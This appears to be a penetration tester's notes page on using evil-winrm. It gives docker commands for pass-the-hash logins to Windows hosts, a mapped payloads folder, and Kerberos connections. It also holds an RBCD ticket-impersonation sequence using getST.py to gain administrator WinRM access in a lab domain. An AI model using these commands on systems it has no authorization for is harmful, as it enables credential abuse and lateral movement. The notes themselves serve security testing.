# evil-winrm
[evil-winrm](https://github.com/Hackplayers/evil-winrm) is awesome for PowerShell remoting into devices - even with just a local admin *hash*!

## Connect to host with evil-winrm using docker and an account hash
```
sudo docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 1.2.3.4 -u administrator -H YOUR-HASH-GOES-HERE
```

If you're going to connect with a password, replace `-H YOUR-HASH-GOES-HERE` with `-p YOUR-PASS-HERE`.

## Connect to host with a local directory mapped for uploads and downloads
This is important.  If you're going to connect to a host and want to be able to upload/download files, you need to map a drive like so:

```
sudo docker run -v /home/sevminsec/Desktop/payloads:/data --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.1 -u 7ms -p supsecpass!
```

## Use Kerberos
The [README](https://github.com/Hackplayers/evil-winrm) talks about how to get Kerberos going with evil-winrm, and I'm not sure how necessary the installation of the Kerberos packages was, nor the editing of `/etc/krb5.conf`.  But what I DO know is I got all sorts of errors trying to get the Kerberos connection made until I did the following command inside of [exegol](/software/exegol/): 

```
evil-winrm -i HOST -r domain.com 
```

### Misc Kerberos troubleshooting notes
If you're in a RBCD situation where you've stolen a TGS so that you can connect to (for example) the SMB service as admin, I finally had a need to steal a WINRM ticket so I could pass that with evil-winrm.  The commands were as follows (with *TT-DEVO1* being the victim in a domain called *tangent.town*:

```
getST.py -impersonate administrator -spn 'WSMAN/TT-DEV01.tangent.town' -dc-ip 192.168.10.100 'tangent.town/PHANTOM$' -k -no-pass

export KRB5CCNAME=administrator@WSMAN_TT-DEV01.tangent.town@TANGENT.TOWN.ccache 

evil-winrm -i TT-DEV01.tangent.town -r tangent.town --spn WSMAN
```